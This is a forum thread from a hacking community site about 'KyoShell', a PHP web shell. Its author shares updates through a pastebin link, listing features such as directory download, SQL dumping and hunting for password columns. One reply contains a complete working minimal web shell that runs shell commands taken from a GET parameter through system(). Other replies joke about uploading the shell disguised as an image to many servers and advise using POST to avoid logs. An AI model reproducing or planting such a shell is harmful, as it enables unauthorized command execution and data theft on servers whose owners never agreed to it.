Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
KyoShell [PHP]
Posted by: Kyo
Date: December 19, 2009 06:58AM

I am fairly positive that once upon a time I have posted a version of my shell here somewhere, but today I've made some extensions to it for my needs that I think someone might find useful. What I have added is the downloading of directories on a server as zip files, given that either exec() or the Zip class works (as means of zipping the actual directory). As always, this is something I created to learn more PHP and then slowly grew into a monster getting features according to my needs, so parts of it may be incomplete, but you will find it is quite handy and comfortable.
The difference to the c99 shell, I would say is that it's more about learning about the system and perhaps changing things, and less about getting access and nuking everything.

But enough talk; here's the code:

http://pastebin.com/ejTsG1M0



Edited 11 time(s). Last edit at 01/11/2011 03:50PM by Kyo.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: barbarianbob
Date: December 19, 2009 03:37PM

This is very nice. Looks like I'll be uploading kyo.php.pjpeg to a bunch of servers in the incoming months. :)

I do have a minor change that I think you missed: error suppressing is missing on the $_REQUEST vars on lines 570-599, which ends up yelling xdebug information on my server.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: December 20, 2009 08:35AM

Yeah, I just added that recently and haven't changed everything yet. I'll keep this thread updated (currently also extending the MySQL functionality)

I'm glad you like it!

Edit: Alright, I updated the shell in the first post. It now has MySQL MiniAdmin function. So far, it allows you to view tables, databases, their contents and drop/empty tables. Editing and inserting you will have to through the query tool, for now.



Edited 1 time(s). Last edit at 12/20/2009 01:40PM by Kyo.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: December 21, 2009 07:46AM

Now with SQL dump function!

Please report any bugs or submit improvement suggestions. Amazingly, the shell is still less than 50kb big!

edit: fixed a bug for the dumping function; adding a password column searching function. In a nutshell, it looks for columns with "pass" or "pw" in the name in all databases, tables



Edited 2 time(s). Last edit at 12/21/2009 09:27AM by Kyo.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: rvdh
Date: December 26, 2009 04:05PM

<html><body bgcolor="#000000">
<form name="h4x" action="" method="GET">
<textarea cols="100" rows="40"><?php $_GET['cmd'] ? system($_GET['cmd']) : system("cd /"); ?></textarea><br />
<input type="text" name="cmd" value="" size="99">
</form>
</body>
</html>



Edited 1 time(s). Last edit at 12/26/2009 04:09PM by rvdh.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: lightos
Date: December 26, 2009 04:55PM

Personally I prefer $_POST to avoid logs.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: December 29, 2009 10:41AM

What's the difference between system() and exec()? My shell has exec() and I'm not quite clear on what the advantage/difference of using system() is

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: February 26, 2010 04:42PM

new version

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: kevin85
Date: June 08, 2010 01:15PM

Very Useful Thanks

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: August 18, 2010 07:47AM

Lots of additions this time. Added a tar fallback in case neither a zip class nor library is installed on the server for directory downloading. Fixed some errors depending on the system you run this on here and there.

The biggest update was probably to the MySQL miniadmin. I improved it's sql dumping capabilities. You can not edit/delete table entries while browsing them. You can also browse data with more complex queries, rather than just all entries in a table, so you no longer have to use the query maker for that.

Still no insert, though. You'll have to make thos equeries yourself. I'll add that soon. This version is pretty awesome.

Oh, also I added a password protection thing so you can use it to administrate your own server, if you dare :P. This thing isn't exactly secured against CSRF.



Edited 1 time(s). Last edit at 08/18/2010 07:48AM by Kyo.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Skyphire
Date: August 20, 2010 12:08PM

@Kyo

Yeah I don't think it's really necessary to protect it, as I would use it only off-line and never on a server if you get my drift.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: August 21, 2010 01:02PM

Yeah. Just liked the option. Nobody said you had to employ the password protection on your OWN server, but you might still want to have one in place ;)

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Skyphire
Date: August 23, 2010 11:08AM

Oh wait. My bad I posted this in a totally different thread. I thought it was about that webapp scanner.

Options: ReplyQuote
Re: KyoShell [PHP]
Posted by: Kyo
Date: January 11, 2011 03:50PM

newest version:

http://pastebin.com/ejTsG1M0

It has unfortuantely gotten too big to post it in here.

New features... not sure which version I last posted here, what with the rollback. It defintely has some patches for the mysql dumping, you can now do partial table dumps (specifying limit, order & where), upload files instead of having to touch & post contents (seeing as how some servers have problem with html and similar posted).

Fixed a bug to restore php 4 compatibility. If anything doesn't work, just say.

Options: ReplyQuote


Sorry, only registered users may post in this forum.